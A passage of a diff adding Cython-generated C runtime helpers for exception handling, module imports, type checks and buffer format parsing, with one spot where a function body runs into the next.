NULL; + } else { + *value = exc_value; + Py_INCREF(*value); + *type = (PyObject*) Py_TYPE(exc_value); + Py_INCREF(*type); + *tb = PyException_GetTraceback(exc_value); + } + #elif CYTHON_USE_EXC_INFO_STACK + _PyErr_StackItem *exc_info = __Pyx_PyErr_GetTopmostException(tstate); + *type = exc_info->exc_type; + *value = exc_info->exc_value; + *tb = exc_info->exc_traceback; + Py_XINCREF(*type); + Py_XINCREF(*value); + Py_XINCREF(*tb); + #else + *type = tstate->exc_type; + *value = tstate->exc_value; + *tb = tstate->exc_traceback; + Py_XINCREF(*type); + Py_XINCREF(*value); + Py_XINCREF(*tb); + #endif +} +static CYTHON_INLINE void __Pyx__ExceptionReset(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb) { + #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 + _PyErr_StackItem *exc_info = tstate->exc_info; + PyObject *tmp_value = exc_info->exc_value; + exc_info->exc_value = value; + Py_XDECREF(tmp_value); + Py_XDECREF(type); + Py_XDECREF(tb); + #else + PyObject *tmp_type, *tmp_value, *tmp_tb; + #if CYTHON_USE_EXC_INFO_STACK + _PyErr_StackItem *exc_info = tstate->exc_info; + tmp_type = exc_info->exc_type; + tmp_value = exc_info->exc_value; + tmp_tb = exc_info->exc_traceback; + exc_info->exc_type = type; + exc_info->exc_value = value; + exc_info->exc_traceback = tb; + #else + tmp_type = tstate->exc_type; + tmp_value = tstate->exc_value; + tmp_tb = tstate->exc_traceback; + tstate->exc_type = type; + tstate->exc_value = value; + tstate->exc_traceback = tb; + #endif + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); + #endif +} +#endif + +/* GetException */ +#if CYTHON_FAST_THREAD_STATE +static int __Pyx__GetException(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) +#else +static int __Pyx_GetException(PyObject **type, PyObject **value, PyObject **tb) +#endif +{ + PyObject *local_type = NULL, *local_value, *local_tb = NULL; +#if CYTHON_FAST_THREAD_STATE + PyObject *tmp_type, *tmp_value, *tmp_tb; + #if PY_VERSION_HEX >= 0x030C00A6 + local_value = tstate->current_exception; + tstate->current_exception = 0; + if (likely(local_value)) { + local_type = (PyObject*) Py_TYPE(local_value); + Py_INCREF(local_type); + local_tb = PyException_GetTraceback(local_value); + } + #else + local_type = tstate->curexc_type; + local_value = tstate->curexc_value; + local_tb = tstate->curexc_traceback; + tstate->curexc_type = 0; + tstate->curexc_value = 0; + tstate->curexc_traceback = 0; + #endif +#else + PyErr_Fetch(&local_type, &local_value, &local_tb); +#endif + PyErr_NormalizeException(&local_type, &local_value, &local_tb); +#if CYTHON_FAST_THREAD_STATE && PY_VERSION_HEX >= 0x030C00A6 + if (unlikely(tstate->current_exception)) +#elif CYTHON_FAST_THREAD_STATE + if (unlikely(tstate->curexc_type)) +#else + if (unlikely(PyErr_Occurred())) +#endif + goto bad; + #if PY_MAJOR_VERSION >= 3 + if (local_tb) { + if (unlikely(PyException_SetTraceback(local_value, local_tb) < 0)) + goto bad; + } + #endif + Py_XINCREF(local_tb); + Py_XINCREF(local_type); + Py_XINCREF(local_value); + *type = local_type; + *value = local_value; + *tb = local_tb; +#if CYTHON_FAST_THREAD_STATE + #if CYTHON_USE_EXC_INFO_STACK + { + _PyErr_StackItem *exc_info = tstate->exc_info; + #if PY_VERSION_HEX >= 0x030B00a4 + tmp_value = exc_info->exc_value; + exc_info->exc_value = local_value; + tmp_type = NULL; + tmp_tb = NULL; + Py_XDECREF(local_type); + Py_XDECREF(local_tb); + #else + tmp_type = exc_info->exc_type; + tmp_value = exc_info->exc_value; + tmp_tb = exc_info->exc_traceback; + exc_info->exc_type = local_type; + exc_info->exc_value = local_value; + exc_info->exc_traceback = local_tb; + #endif + } + #else + tmp_type = tstate->exc_type; + tmp_value = tstate->exc_value; + tmp_tb = tstate->exc_traceback; + tstate->exc_type = local_type; + tstate->exc_value = local_value; + tstate->exc_traceback = local_tb; + #endif + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); +#else + PyErr_SetExcInfo(local_type, local_value, local_tb); +#endif + return 0; +bad: + *type = 0; + *value = 0; + *tb = 0; + Py_XDECREF(local_type); + Py_XDECREF(local_value); + Py_XDECREF(local_tb); + return -1; +} + +/* SwapException */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx__ExceptionSwap(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { + PyObject *tmp_type, *tmp_value, *tmp_tb; + #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 + _PyErr_StackItem *exc_info = tstate->exc_info; + tmp_value = exc_info->exc_value; + exc_info->exc_value = *value; + if (tmp_value == NULL || tmp_value == Py_None) { + Py_XDECREF(tmp_value); + tmp_value = NULL; + tmp_type = NULL; + tmp_tb = NULL; + } else { + tmp_type = (PyObject*) Py_TYPE(tmp_value); + Py_INCREF(tmp_type); + #if CYTHON_COMPILING_IN_CPYTHON + tmp_tb = ((PyBaseExceptionObject*) tmp_value)->traceback; + Py_XINCREF(tmp_tb); + #else + tmp_tb = PyException_GetTraceback(tmp_value); + #endif + } + #elif CYTHON_USE_EXC_INFO_STACK + _PyErr_StackItem *exc_info = tstate->exc_info; + tmp_type = exc_info->exc_type; + tmp_value = exc_info->exc_value; + tmp_tb = exc_info->exc_traceback; + exc_info->exc_type = *type; + exc_info->exc_value = *value; + exc_info->exc_traceback = *tb; + #else + tmp_type = tstate->exc_type; + tmp_value = tstate->exc_value; + tmp_tb = tstate->exc_traceback; + tstate->exc_type = *type; + tstate->exc_value = *value; + tstate->exc_traceback = *tb; + #endif + *type = tmp_type; + *value = tmp_value; + *tb = tmp_tb; +} +#else +static CYTHON_INLINE void __Pyx_ExceptionSwap(PyObject **type, PyObject **value, PyObject **tb) { + PyObject *tmp_type, *tmp_value, *tmp_tb; + PyErr_GetExcInfo(&tmp_type, &tmp_value, &tmp_tb); + PyErr_SetExcInfo(*type, *value, *tb); + *type = tmp_type; + *value = tmp_value; + *tb = tmp_tb; +} +#endif + +/* Import */ +static PyObject *__Pyx_Import(PyObject *name, PyObject *from_list, int level) { + PyObject *module = 0; + PyObject *empty_dict = 0; + PyObject *empty_list = 0; + #if PY_MAJOR_VERSION < 3 + PyObject *py_import; + py_import = __Pyx_PyObject_GetAttrStr(__pyx_b, __pyx_n_s_import); + if (unlikely(!py_import)) + goto bad; + if (!from_list) { + empty_list = PyList_New(0); + if (unlikely(!empty_list)) + goto bad; + from_list = empty_list; + } + #endif + empty_dict = PyDict_New(); + if (unlikely(!empty_dict)) + goto bad; + { + #if PY_MAJOR_VERSION >= 3 + if (level == -1) { + if ((1) && (strchr(__Pyx_MODULE_NAME, '.'))) { + #if CYTHON_COMPILING_IN_LIMITED_API + module = PyImport_ImportModuleLevelObject( + name, empty_dict, empty_dict, from_list, 1); + #else + module = PyImport_ImportModuleLevelObject( + name, __pyx_d, empty_dict, from_list, 1); + #endif + if (unlikely(!module)) { + if (unlikely(!PyErr_ExceptionMatches(PyExc_ImportError))) + goto bad; + PyErr_Clear(); + } + } + level = 0; + } + #endif + if (!module) { + #if PY_MAJOR_VERSION < 3 + PyObject *py_level = PyInt_FromLong(level); + if (unlikely(!py_level)) + goto bad; + module = PyObject_CallFunctionObjArgs(py_import, + name, __pyx_d, empty_dict, from_list, py_level, (PyObject *)NULL); + Py_DECREF(py_level); + #else + #if CYTHON_COMPILING_IN_LIMITED_API + module = PyImport_ImportModuleLevelObject( + name, empty_dict, empty_dict, from_list, level); + #else + module = PyImport_ImportModuleLevelObject( + name, __pyx_d, empty_dict, from_list, level); + #endif + #endif + } + } +bad: + Py_XDECREF(empty_dict); + Py_XDECREF(empty_list); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(py_import); + #endif + return module; +} + +/* ImportDottedModule */ +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx__ImportDottedModule_Error(PyObject *name, PyObject *parts_tuple, Py_ssize_t count) { + PyObject *partial_name = NULL, *slice = NULL, *sep = NULL; + if (unlikely(PyErr_Occurred())) { + PyErr_Clear(); + } + if (likely(PyTuple_GET_SIZE(parts_tuple) == count)) { + partial_name = name; + } else { + slice = PySequence_GetSlice(parts_tuple, 0, count); + if (unlikely(!slice)) + goto bad; + sep = PyUnicode_FromStringAndSize(".", 1); + if (unlikely(!sep)) + goto bad; + partial_name = PyUnicode_Join(sep, slice); + } + PyErr_Format( +#if PY_MAJOR_VERSION < 3 + PyExc_ImportError, + "No module named '%s'", PyString_AS_STRING(partial_name)); +#else +#if PY_VERSION_HEX >= 0x030600B1 + PyExc_ModuleNotFoundError, +#else + PyExc_ImportError, +#endif + "No module named '%U'", partial_name); +#endif +bad: + Py_XDECREF(sep); + Py_XDECREF(slice); + Py_XDECREF(partial_name); + return NULL; +} +#endif +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx__ImportDottedModule_Lookup(PyObject *name) { + PyObject *imported_module; +#if PY_VERSION_HEX < 0x030700A1 || (CYTHON_COMPILING_IN_PYPY && PYPY_VERSION_NUM < 0x07030400) + PyObject *modules = PyImport_GetModuleDict(); + if (unlikely(!modules)) + return NULL; + imported_module = __Pyx_PyDict_GetItemStr(modules, name); + Py_XINCREF(imported_module); +#else + imported_module = PyImport_GetModule(name); +#endif + return imported_module; +} +#endif +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_ImportDottedModule_WalkParts(PyObject *module, PyObject *name, PyObject *parts_tuple) { + Py_ssize_t i, nparts; + nparts = PyTuple_GET_SIZE(parts_tuple); + for (i=1; i < nparts && module; i++) { + PyObject *part, *submodule; +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + part = PyTuple_GET_ITEM(parts_tuple, i); +#else + part = PySequence_ITEM(parts_tuple, i); +#endif + submodule = __Pyx_PyObject_GetAttrStrNoError(module, part); +#if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) + Py_DECREF(part); +#endif + Py_DECREF(module); + module = submodule; + } + if (unlikely(!module)) { + return __Pyx__ImportDottedModule_Error(name, parts_tuple, i); + } + return module; +} +#endif +static PyObject *__Pyx__ImportDottedModule(PyObject *name, PyObject *parts_tuple) { +#if PY_MAJOR_VERSION < 3 + PyObject *module, *from_list, *star = __pyx_n_s__3; + CYTHON_UNUSED_VAR(parts_tuple); + from_list = PyList_New(1); + if (unlikely(!from_list)) + return NULL; + Py_INCREF(star); + PyList_SET_ITEM(from_list, 0, star); + module = __Pyx_Import(name, from_list, 0); + Py_DECREF(from_list); + return module; +#else + PyObject *imported_module; + PyObject *module = __Pyx_Import(name, NULL, 0); + if (!parts_tuple || unlikely(!module)) + return module; + imported_module = __Pyx__ImportDottedModule_Lookup(name); + if (likely(imported_module)) { + Py_DECREF(module); + return imported_module; + } + PyErr_Clear(); + return __Pyx_ImportDottedModule_WalkParts(module, name, parts_tuple); +#endif +} +static PyObject *__Pyx_ImportDottedModule(PyObject *name, PyObject *parts_tuple) { +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030400B1 + PyObject *module = __Pyx__ImportDottedModule_Lookup(name); + if (likely(module)) { + PyObject *spec = __Pyx_PyObject_GetAttrStrNoError(module, __pyx_n_s_spec); + if (likely(spec)) { + PyObject *unsafe = __Pyx_PyObject_GetAttrStrNoError(spec, __pyx_n_s_initializing); + if (likely(!unsafe || !__Pyx_PyObject_IsTrue(unsafe))) { + Py_DECREF(spec); + spec = NULL; + } + Py_XDECREF(unsafe); + } + if (likely(!spec)) { + PyErr_Clear(); + return module; + } + Py_DECREF(spec); + Py_DECREF(module); + } else if (PyErr_Occurred()) { + PyErr_Clear(); + } +#endif + return __Pyx__ImportDottedModule(name, parts_tuple); +} + +/* ssize_strlen */ +static CYTHON_INLINE Py_ssize_t __Pyx_ssize_strlen(const char *s) { + size_t len = strlen(s); + if (unlikely(len > PY_SSIZE_T_MAX)) { + PyErr_SetString(PyExc_OverflowError, "byte string is too long"); + return -1; + } + return (Py_ssize_t) len; +} + +/* FastTypeChecks */ +#if CYTHON_COMPILING_IN_CPYTHON +static int __Pyx_InBases(PyTypeObject *a, PyTypeObject *b) { + while (a) { + a = __Pyx_PyType_GetSlot(a, tp_base, PyTypeObject*); + if (a == b) + return 1; + } + return b == &PyBaseObject_Type; +} +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (a == b) return 1; + mro = a->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + if (PyTuple_GET_ITEM(mro, i) == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(a, b); +} +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (cls == a || cls == b) return 1; + mro = cls->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + PyObject *base = PyTuple_GET_ITEM(mro, i); + if (base == (PyObject *)a || base == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(cls, a) || __Pyx_InBases(cls, b); +} +#if PY_MAJOR_VERSION == 2 +static int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject* exc_type2) { + PyObject *exception, *value, *tb; + int res; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&exception, &value, &tb); + res = exc_type1 ? PyObject_IsSubclass(err, exc_type1) : 0; + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + if (!res) { + res = PyObject_IsSubclass(err, exc_type2); + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + } + __Pyx_ErrRestore(exception, value, tb); + return res; +} +#else +static CYTHON_INLINE int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject *exc_type2) { + if (exc_type1) { + return __Pyx_IsAnySubtype2((PyTypeObject*)err, (PyTypeObject*)exc_type1, (PyTypeObject*)exc_type2); + } else { + return __Pyx_IsSubtype((PyTypeObject*)err, (PyTypeObject*)exc_type2); + } +} +#endif +static int __Pyx_PyErr_GivenExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + assert(PyExceptionClass_Check(exc_type)); + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; itp_as_sequence && type->tp_as_sequence->sq_repeat)) { + return type->tp_as_sequence->sq_repeat(seq, mul); + } else +#endif + { + return __Pyx_PySequence_Multiply_Generic(seq, mul); + } +} + +/* SetItemInt */ +static int __Pyx_SetItemInt_Generic(PyObject *o, PyObject *j, PyObject *v) { + int r; + if (unlikely(!j)) return -1; + r = PyObject_SetItem(o, j, v); + Py_DECREF(j); + return r; +} +static CYTHON_INLINE int __Pyx_SetItemInt_Fast(PyObject *o, Py_ssize_t i, PyObject *v, int is_list, + CYTHON_NCP_UNUSED int wraparound, CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS && CYTHON_USE_TYPE_SLOTS + if (is_list || PyList_CheckExact(o)) { + Py_ssize_t n = (!wraparound) ? i : ((likely(i >= 0)) ? i : i + PyList_GET_SIZE(o)); + if ((!boundscheck) || likely(__Pyx_is_valid_index(n, PyList_GET_SIZE(o)))) { + PyObject* old = PyList_GET_ITEM(o, n); + Py_INCREF(v); + PyList_SET_ITEM(o, n, v); + Py_DECREF(old); + return 1; + } + } else { + PyMappingMethods *mm = Py_TYPE(o)->tp_as_mapping; + PySequenceMethods *sm = Py_TYPE(o)->tp_as_sequence; + if (mm && mm->mp_ass_subscript) { + int r; + PyObject *key = PyInt_FromSsize_t(i); + if (unlikely(!key)) return -1; + r = mm->mp_ass_subscript(o, key, v); + Py_DECREF(key); + return r; + } + if (likely(sm && sm->sq_ass_item)) { + if (wraparound && unlikely(i < 0) && likely(sm->sq_length)) { + Py_ssize_t l = sm->sq_length(o); + if (likely(l >= 0)) { + i += l; + } else { + if (!PyErr_ExceptionMatches(PyExc_OverflowError)) + return -1; + PyErr_Clear(); + } + } + return sm->sq_ass_item(o, i, v); + } + } +#else +#if CYTHON_COMPILING_IN_PYPY + if (is_list || (PySequence_Check(o) && !PyDict_Check(o))) +#else + if (is_list || PySequence_Check(o)) +#endif + { + return PySequence_SetItem(o, i, v); + } +#endif + return __Pyx_SetItemInt_Generic(o, PyInt_FromSsize_t(i), v); +} + +/* RaiseUnboundLocalError */ +static CYTHON_INLINE void __Pyx_RaiseUnboundLocalError(const char *varname) { + PyErr_Format(PyExc_UnboundLocalError, "local variable '%s' referenced before assignment", varname); +} + +/* DivInt[long] */ +static CYTHON_INLINE long __Pyx_div_long(long a, long b) { + long q = a / b; + long r = a - q*b; + q -= ((r != 0) & ((r ^ b) < 0)); + return q; +} + +/* ImportFrom */ +static PyObject* __Pyx_ImportFrom(PyObject* module, PyObject* name) { + PyObject* value = __Pyx_PyObject_GetAttrStr(module, name); + if (unlikely(!value) && PyErr_ExceptionMatches(PyExc_AttributeError)) { + const char* module_name_str = 0; + PyObject* module_name = 0; + PyObject* module_dot = 0; + PyObject* full_name = 0; + PyErr_Clear(); + module_name_str = PyModule_GetName(module); + if (unlikely(!module_name_str)) { goto modbad; } + module_name = PyUnicode_FromString(module_name_str); + if (unlikely(!module_name)) { goto modbad; } + module_dot = PyUnicode_Concat(module_name, __pyx_kp_u__2); + if (unlikely(!module_dot)) { goto modbad; } + full_name = PyUnicode_Concat(module_dot, name); + if (unlikely(!full_name)) { goto modbad; } + #if PY_VERSION_HEX < 0x030700A1 || (CYTHON_COMPILING_IN_PYPY && PYPY_VERSION_NUM < 0x07030400) + { + PyObject *modules = PyImport_GetModuleDict(); + if (unlikely(!modules)) + goto modbad; + value = PyObject_GetItem(modules, full_name); + } + #else + value = PyImport_GetModule(full_name); + #endif + modbad: + Py_XDECREF(full_name); + Py_XDECREF(module_dot); + Py_XDECREF(module_name); + } + if (unlikely(!value)) { + PyErr_Format(PyExc_ImportError, + #if PY_MAJOR_VERSION < 3 + "cannot import name %.230s", PyString_AS_STRING(name)); + #else + "cannot import name %S", name); + #endif + } + return value; +} + +/* HasAttr */ +static CYTHON_INLINE int __Pyx_HasAttr(PyObject *o, PyObject *n) { + PyObject *r; + if (unlikely(!__Pyx_PyBaseString_Check(n))) { + PyErr_SetString(PyExc_TypeError, + "hasattr(): attribute name must be string"); + return -1; + } + r = __Pyx_GetAttr(o, n); + if (!r) { + PyErr_Clear(); + return 0; + } else { + Py_DECREF(r); + return 1; + } +} + +/* IsLittleEndian */ +static CYTHON_INLINE int __Pyx_Is_Little_Endian(void) +{ + union { + uint32_t u32; + uint8_t u8[4]; + } S; + S.u32 = 0x01020304; + return S.u8[0] == 4; +} + +/* BufferFormatCheck */ +static void __Pyx_BufFmt_Init(__Pyx_BufFmt_Context* ctx, + __Pyx_BufFmt_StackElem* stack, + __Pyx_TypeInfo* type) { + stack[0].field = &ctx->root; + stack[0].parent_offset = 0; + ctx->root.type = type; + ctx->root.name = "buffer dtype"; + ctx->root.offset = 0; + ctx->head = stack; + ctx->head->field = &ctx->root; + ctx->fmt_offset = 0; + ctx->head->parent_offset = 0; + ctx->new_packmode = '@'; + ctx->enc_packmode = '@'; + ctx->new_count = 1; + ctx->enc_count = 0; + ctx->enc_type = 0; + ctx->is_complex = 0; + ctx->is_valid_array = 0; + ctx->struct_alignment = 0; + while (type->typegroup == 'S') { + ++ctx->head; + ctx->head->field = type->fields; + ctx->head->parent_offset = 0; + type = type->fields->type; + } +} +static int __Pyx_BufFmt_ParseNumber(const char** ts) { + int count; + const char* t = *ts; + if (*t < '0' || *t > '9') { + return -1; + } else { + count = *t++ - '0'; + while (*t >= '0' && *t <= '9') { + count *= 10; + count += *t++ - '0'; + } + } + *ts = t; + return count; +} +static int __Pyx_BufFmt_ExpectNumber(const char **ts) { + int number = __Pyx_BufFmt_ParseNumber(ts); + if (number == -1) + PyErr_Format(PyExc_ValueError,\ + "Does not understand character buffer dtype format string ('%c')", **ts); + return number; +} +static void __Pyx_BufFmt_RaiseUnexpectedChar(char ch) { + PyErr_Format(PyExc_ValueError, + "Unexpected format string character: '%c'", ch); +} +static const char* __Pyx_BufFmt_DescribeTypeChar(char ch, int is_complex) { + switch (ch) { + case '?': return "'bool'"; + case 'c': return "'char'"; + case 'b': return "'signed char'"; + case 'B': return "'unsigned char'"; + case 'h': return "'short'"; + case 'H': return "'unsigned short'"; + case 'i': return "'int'"; + case 'I': return "'unsigned int'"; + case 'l': return "'long'"; + case 'L': return "'unsigned long'"; + case 'q': return "'long long'"; + case 'Q': return "'unsigned long long'"; + case 'f': return (is_complex ? "'complex float'" : "'float'"); + case 'd': return (is_complex ? "'complex double'" : "'double'"); + case 'g': return (is_complex ? "'complex long double'" : "'long double'"); + case 'T': return "a struct"; + case 'O': return "Python object"; + case 'P': return "a pointer"; + case 's': case 'p': return "a string"; + case 0: return "end"; + default: return "unparsable format string"; + } +} +static size_t __Pyx_BufFmt_TypeCharToStandardSize(char ch, int is_complex) { + switch (ch) { + case '?': case 'c': case 'b': case 'B': case 's': case 'p': return 1; + case 'h': case 'H': return 2; + case 'i': case 'I': case 'l': case 'L': return 4; + case 'q': case 'Q': return 8; + case 'f': return (is_complex ? 8 : 4); + case 'd': return (is_complex ? 16 : 8); + case 'g': { + PyErr_SetString(PyExc_ValueError, "Python does not define a standard format string size for long double ('g').."); + return 0; + } + case 'O': case 'P': return sizeof(void*); + default: + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } +} +static size_t __Pyx_BufFmt_TypeCharToNativeSize(char ch, int is_complex) { + switch (ch) { + case '?': case 'c': case 'b': case 'B': case 's': case 'p': return 1; + case 'h': case 'H': return sizeof(short); + case 'i': case 'I': return sizeof(int); + case 'l': case 'L': return sizeof(long); + #ifdef HAVE_LONG_LONG + case 'q': case 'Q': return sizeof(PY_LONG_LONG); + #endif + case 'f': return sizeof(float) * (is_complex ? 2 : 1); + case 'd': return sizeof(double) * (is_complex ? 2 : 1); + case 'g': return sizeof(long double) * (is_complex ? 2 : 1); + case 'O': case 'P': return sizeof(void*); + default: { + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } + } +} +typedef struct { char c; short x; } __Pyx_st_short; +typedef struct { char c; int x; } __Pyx_st_int; +typedef struct { char c; long x; } __Pyx_st_long; +typedef struct { char c; float x; } __Pyx_st_float; +typedef struct { char c; double x; } __Pyx_st_double; +typedef struct { char c; long double x; } __Pyx_st_longdouble; +typedef struct { char c; void *x; } __Pyx_st_void_p; +#ifdef HAVE_LONG_LONG +typedef struct { char c; PY_LONG_LONG x; } __Pyx_st_longlong; +#endif +static size_t __Pyx_BufFmt_TypeCharToAlignment(char ch, int is_complex) { + CYTHON_UNUSED_VAR(is_complex); + switch (ch) { + case '?': case 'c': case 'b': case 'B': case 's': case 'p': return 1; + case 'h': case 'H': return sizeof(__Pyx_st_short) - sizeof(short); + case 'i': case 'I': return sizeof(__Pyx_st_int) - sizeof(int); + case 'l': case 'L': return sizeof(__Pyx_st_long) - sizeof(long); +#ifdef HAVE_LONG_LONG + case 'q': case 'Q': return sizeof(__Pyx_st_longlong) - sizeof(PY_LONG_LONG); +#endif + case 'f': return sizeof(__Pyx_st_float) - sizeof(float); + case 'd': return sizeof(__Pyx_st_double) - sizeof(double); + case 'g': return sizeof(__Pyx_st_longdouble) - sizeof(long double); + case 'P': case 'O': return sizeof(__Pyx_st_void_p) - sizeof(void*); + default: + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } +} +/* These are for computing the padding at the end of the struct to align + on the first member of the struct. This will probably the same as above, + but we don't have any guarantees. + */ +typedef struct { short x; char c; } __Pyx_pad_short; +typedef struct { int x; char c; } __Pyx_pad_int; +typedef struct { long x; char c; } __Pyx_pad_long; +typedef struct { float x; char c; } __Pyx_pad_float; +typedef struct { double x; char c; } __Pyx_pad_double; +typedef struct { long double x; char c; } __Pyx_pad_longdouble; +typedef struct { void *x; char c; } __Pyx_pad_void_p; +#ifdef HAVE_LONG_LONG +typedef struct { PY_LONG_LONG x; char c; } __Pyx_pad_longlong; +#endif +static size_t __Pyx_BufFmt_TypeCharToPadding(char ch, int is_complex) { + CYTHON_UNUSED_VAR(is_complex); + switch (ch) { + case '?': case 'c': case 'b': case 'B': case 's': case 'p': return 1; + case 'h': case 'H': return sizeof(__Pyx_pad_short) - sizeof(short); + case 'i': case 'I': return sizeof(__Pyx_pad_int) - sizeof(int); + case 'l': case 'L': return sizeof(__Pyx_pad_long) - sizeof(long); +#ifdef HAVE_LONG_LONG + case 'q': case 'Q': return sizeof(__Pyx_pad_longlong) - sizeof(PY_LONG_LONG); +#endif + case 'f': return sizeof(__Pyx_pad_float) - sizeof(float); + case 'd': return sizeof(__Pyx_pad_double) - sizeof(double); + case 'g': return sizeof(__Pyx_pad_longdouble) - sizeof(long double); + case 'P': case 'O': return sizeof(__Pyx_pad_void_p) - sizeof(void*); + default: + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } +} +static char __Pyx_BufFmt_TypeCharToGroup(char ch, int is_complex) { + switch (ch) { + case 'c': + return 'H'; + case 'b': case 'h': case 'i': + case 'l': case 'q': case 's': case 'p': + return 'I'; + case '?': case 'B': case 'H': case 'I': case 'L': case 'Q': + return 'U'; + case 'f': case 'd': case 'g': + return (is_complex ? 'C' : 'R'); + case 'O': + return 'O'; + case 'P': + return 'P'; + default: { + __Pyx_BufFmt_RaiseUnexpectedChar(ch); + return 0; + } + } +} +static void __Pyx_BufFmt_RaiseExpected(__Pyx_BufFmt_Context* ctx) { + if (ctx->head == NULL || ctx->head->field == &ctx->root) { + const char* expected; + const char* quote; + if (ctx->head == NULL) { + expected = "end"; + quote = ""; + } else { + expected = ctx->head->field->type->name; + quote = "'"; + } + PyErr_Format(PyExc_ValueError, + "Buffer dtype mismatch, expected %s%s%s but got %s", + quote, expected, quote, + __Pyx_BufFmt_DescribeTypeChar(ctx->enc_type, ctx->is_complex)); + } else { + __Pyx_StructField* field = ctx->head->field; + __Pyx_StructField* parent = (ctx->head - 1)->field; + PyErr_Format(PyExc_ValueError, + "Buffer dtype mismatch, expected '%s' but got %s in '%s.%s'", + field->type->name, __Pyx_BufFmt_DescribeTypeChar(ctx->enc_type, ctx->is_complex), + parent->type->name, field->name); + } +} +static int __Pyx_BufFmt_ProcessTypeChunk(__Pyx_BufFmt_Context* ctx) { + char group; + size_t size, offset, arraysize = 1; + if (ctx->enc_type == 0) return 0; + if (ctx->head->field->type->arraysize[0]) { + int i, ndim = 0; + if (ctx->enc_type == 's' || ctx->enc_type == 'p') { + ctx->is_valid_array = ctx->head->field->type->ndim == 1; + ndim = 1; + if (ctx->enc_count != ctx->head->field->type->arraysize[0]) { + PyErr_Format(PyExc_ValueError, + "Expected a dimension of size %zu, got %zu", + ctx->head->field->type->arraysize[0], ctx->enc_count); + return -1; + } + } + if (!ctx->is_valid_array) { + PyErr_Format(PyExc_ValueError, "Expected %d dimensions, got %d", + ctx->head->field->type->ndim, ndim); + return -1; + } + for (i = 0; i < ctx->head->field->type->ndim; i++) { + arraysize *= ctx->head->field->type->arraysize[i]; + } + ctx->is_valid_array = 0; + ctx->enc_count = 1; + } + group = __Pyx_BufFmt_TypeCharToGroup(ctx->enc_type, ctx->is_complex); + do { + __Pyx_StructField* field = ctx->head->field; + __Pyx_TypeInfo* type = field->type; + if (ctx->enc_packmode == '@' || ctx->enc_packmode == '^') { + size = __Pyx_BufFmt_TypeCharToNativeSize(ctx->enc_type, ctx->is_complex); + } else { + size = __Pyx_BufFmt_TypeCharToStandardSize(ctx->enc_type, ctx->is_complex); + } + if (ctx->enc_packmode == '@') { + size_t align_at = __Pyx_BufFmt_TypeCharToAlignment(ctx->enc_type, ctx->is_complex); + size_t align_mod_offset; + if (align_at == 0) return -1; + align_mod_offset = ctx->fmt_offset % align_at; + if (align_mod_offset > 0) ctx->fmt_offset += align_at - align_mod_offset; + if (ctx->struct_alignment == 0) + ctx->struct_alignment = __Pyx_BufFmt_TypeCharToPadding(ctx->enc_type, + ctx->is_complex); + } + if (type->size != size || type->typegroup != group) { + if (type->typegroup == 'C' && type->fields != NULL) { + size_t parent_offset = ctx->head->parent_offset + field->offset; + ++ctx->head; + ctx->head->field = type->fields; + ctx->head->parent_offset = parent_offset; + continue; + } + if ((type->typegroup == 'H' || group == 'H') && type->size == size) { + } else { + __Pyx_BufFmt_RaiseExpected(ctx); + return -1; + } + } + offset = ctx->head->parent_offset + field->offset; + if (ctx->fmt_offset != offset) { + PyErr_Format(PyExc_ValueError, + "Buffer dtype mismatch; next field is at offset %" CYTHON_FORMAT_SSIZE_T "d but %" CYTHON_FORMAT_SSIZE_T "d expected", + (Py_ssize_t)ctx->fmt_offset, (Py_ssize_t)offset); + return -1; + } + ctx->fmt_offset += size; + if (arraysize) + ctx->fmt_offset += (arraysize - 1) * size; + --ctx->enc_count; + while (1) { + if (field == &ctx->root) { + ctx->head = NULL; + if (ctx->enc_count != 0) { + __Pyx_BufFmt_RaiseExpected(ctx); + return -1; + } + break; + } + ctx->head->field = ++field; + if (field->type == NULL) { + --ctx->head; + field = ctx->head->field; + continue; + } else if (field->type->typegroup == 'S') { + size_t parent_offset = ctx->head->parent_offset + field->offset; + if (field->type->fields->type == NULL) continue; + field = 